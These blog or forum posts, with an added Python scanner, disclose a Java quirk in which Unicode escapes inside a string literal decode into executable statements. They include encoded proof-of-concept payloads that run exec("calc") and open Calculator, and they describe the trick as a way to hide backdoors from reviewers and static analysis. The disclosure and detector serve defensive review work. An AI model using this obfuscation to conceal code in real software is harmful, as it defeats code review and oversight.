Abraham Kang

Abraham's posts
I know I have been quiet for a while but wanted to start reaching out to people again.

I am working on a book / guide called either "Avoiding the pitfalls of Static Analysis" or "Getting the Most Out of Static Analysis".

Let me know if you think the content is helpful

What about the following:

//Declaring a String executes code
//(javac translates \uXXXX escapes before tokenizing, JLS 3.3: \u0022 becomes a real
// double quote that closes the literal, and the escapes that follow decode to
// statements. Compiles inside a method body with java.io.IOException imported.)
String Spanish_EULA =  "\u0022\u003b\u0074\u0072\u0079\u0020\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u006f\u0070\u0065\u006e\u0020\u002d\u0061\u0020\u0043\u0061\u006c\u0063\u0075\u006c\u0061\u0074\u006f\u0072\u0022\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0074\u0072\u0079\u0020\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u0063\u0061\u006c\u0063\u0022\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0078\u0020\u003d\u0020\u0022";

Unicode character escaping is similar to HTML escaping in the minds of most people. When you HTML encode strings you expect them not to be evaluated as markup. Similarly, if you Unicode encode strings you expect the characters to be treated as text, not code. Jeff, you wrote the XSS Cheat Sheet. You know what I am talking about.

If the spec allows this then it should be changed for the above reason.

Well, I got a lot of feedback from the disclosure. Some people, and rightly so, pointed out that this had been disclosed a while ago. They are correct to a certain extent, but the way I used it was counter to what was expected.

What was disclosed before looked like:

/*
\u00a3\u003c…
*/

and 

<%\u00a3\u003c…%>

Good findings but when a code reviewer looks at these they will instantly know something is up.

What about the following:

System.out.println("Russian EULA:  \u00a3\u003c…");

The whole purpose of the unicode encodings was to allow you to embed unicode characters into your program.

System.out.println("\u0053\u0074\u0061\u0072\u0074");

Prints "Start"

A normal developer would think that Unicode characters in between quotes would be treated as text.  Unfortunately, as my previous posting shows, this is not the case.

I think this is a bug or an oversight in the Java spec.  

Because the bad guys can use this to hide code without raising suspicions, I think it is a vulnerability.

Respectfully,
Abe
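The mechanism behind the two payloads above (the Spanish_EULA declaration and the earlier println) is that javac applies the \uXXXX translation described in JLS 3.3 before it tokenizes the source, so an escape that decodes to a quote, semicolon or comment delimiter changes the token structure rather than the text. The following is an added example, my own code and not Abe's, of the check a code reviewer or static-analysis pipeline would want: it performs that same translation (including the even-number-of-backslashes rule and the rule that a decoded character never starts a further escape), shows what the compiler actually sees, and flags every escape whose decoded character is structural, plus the lower-severity case of escapes that merely spell printable ASCII. The sample source lines are constructed for the example; the hidden payload uses a println instead of Runtime.exec so it is harmless.

```python
import re

# Characters that change how javac tokenizes a line once the \uXXXX escapes have
# been translated. JLS 3.3 performs that translation before lexing, so an escape
# that decodes to one of these is not "text inside quotes": it is structure.
STRUCTURAL = {
    '"':  'double quote (closes/opens a string literal)',
    "'":  'single quote (closes/opens a char literal)',
    '\\': 'backslash (starts a string escape)',
    '\n': 'newline (ends a // comment or breaks a literal)',
    '\r': 'carriage return (ends a // comment or breaks a literal)',
    '/':  'slash (can form // or */)',
    '*':  'asterisk (can form /* or */)',
    ';':  'semicolon (statement terminator)',
    '{':  'open brace', '}': 'close brace',
    '(':  'open paren', ')': 'close paren',
}

# A Unicode escape is a backslash, one or more 'u', then exactly four hex digits.
ESCAPE = re.compile(r'\\u+([0-9a-fA-F]{4})')


def translate_unicode_escapes(src):
    r"""Apply the JLS 3.3 translation to raw source text.

    Returns (translated_text, findings), where findings is a list of
    (offset, escape_text, decoded_char). Two rules matter for correctness:
    a backslash starts an escape only if an even number of contiguous raw
    backslashes precede it (so "\\u0041" is not an escape), and a character
    produced by an escape never starts a further escape (so "\u005cu005a"
    yields the six characters \u005a, not 'Z').
    """
    out, findings = [], []
    i, n, preceding = 0, len(src), 0
    while i < n:
        ch = src[i]
        if ch == '\\' and preceding % 2 == 0:
            m = ESCAPE.match(src, i)
            if m:
                decoded = chr(int(m.group(1), 16))
                findings.append((i, m.group(0), decoded))
                out.append(decoded)
                i = m.end()
                preceding = 0  # a decoded char is not a raw backslash
                continue
        preceding = preceding + 1 if ch == '\\' else 0
        out.append(ch)
        i += 1
    return ''.join(out), findings


def scan(lines):
    """Classify every Unicode escape in a list of Java source lines.

    'structural'       : decoded char can alter tokenization (the trick on this page)
    'obfuscated-ascii' : escape spells a printable ASCII char that needed no escaping
    Escapes for genuine non-ASCII text (the intended use) are not reported.
    """
    reports = []
    for lineno, line in enumerate(lines, 1):
        for col, esc, ch in translate_unicode_escapes(line)[1]:
            if ch in STRUCTURAL:
                kind, why = 'structural', STRUCTURAL[ch]
            elif ' ' <= ch <= '~':
                kind, why = 'obfuscated-ascii', 'printable ASCII %r written as an escape' % ch
            else:
                continue
            reports.append({'line': lineno, 'col': col, 'escape': esc,
                            'char': ch, 'kind': kind, 'why': why})
    return reports


def to_unicode_escapes(text):
    """Encode text the way the hidden payloads on this page are written."""
    return ''.join('\\u%04x' % ord(c) for c in text)


# Constructed sample (not real project code): a benign escape, the break-out
# trick from the page with a harmless println instead of Runtime.exec, an
# escaped backslash that must NOT be treated as an escape, and the older
# comment-closing variant.
PAYLOAD = '";System.out.println("hidden");String x = "'
SAMPLE = [
    'import java.io.IOException;',
    'String greeting = "\\u0053\\u0074\\u0061\\u0072\\u0074";',
    'String eula = "' + to_unicode_escapes(PAYLOAD) + '";',
    'String path = "C:\\\\u0041";',
    '/* \\u002a\\u002f System.exit(1); /* */',
]

if __name__ == '__main__':
    print('--- what javac sees after JLS 3.3 translation ---')
    for line in SAMPLE:
        print(translate_unicode_escapes(line)[0])
    print('--- findings ---')
    for r in scan(SAMPLE):
        print('line %(line)d col %(col)d %(escape)s -> %(kind)s: %(why)s' % r)
```

Running it prints the translated view, in which the eula line has become `String eula = "";System.out.println("hidden");String x = "";`, and reports the escapes that made that happen. In a review pipeline the 'structural' findings are the ones to block on; the 'obfuscated-ascii' ones are worth a question, because there is no legitimate reason to write "Start" as five escapes.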

Found something interesting in Java. Reported this as a bug over two years ago to Oracle, but it looks like they did not do anything.

Besides hiding back doors in code, avoiding static analysis and printing text-based pictures, does anyone have any ideas on what else this could be used for?

System.out.println("\u0053\u0074\u0061\u0072\u0074\u0020\u0054\u0065\u0073\u0074\u0022\u0029\u003b\u0074\u0072\u0079\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u006f\u0070\u0065\u006e\u0020\u002d\u0061\u0020\u0043\u0061\u006c\u0063\u0075\u006c\u0061\u0074\u006f\u0072\u0022\u0029\u003b\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0074\u0072\u0079\u0020\u007b\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0022\u0063\u0061\u006c\u0063\u0022\u0029\u003b\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0049\u004f\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0065\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u007d\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u0022\u0045\u006e\u0064\u0020\u0054\u0065\u0073\u0074");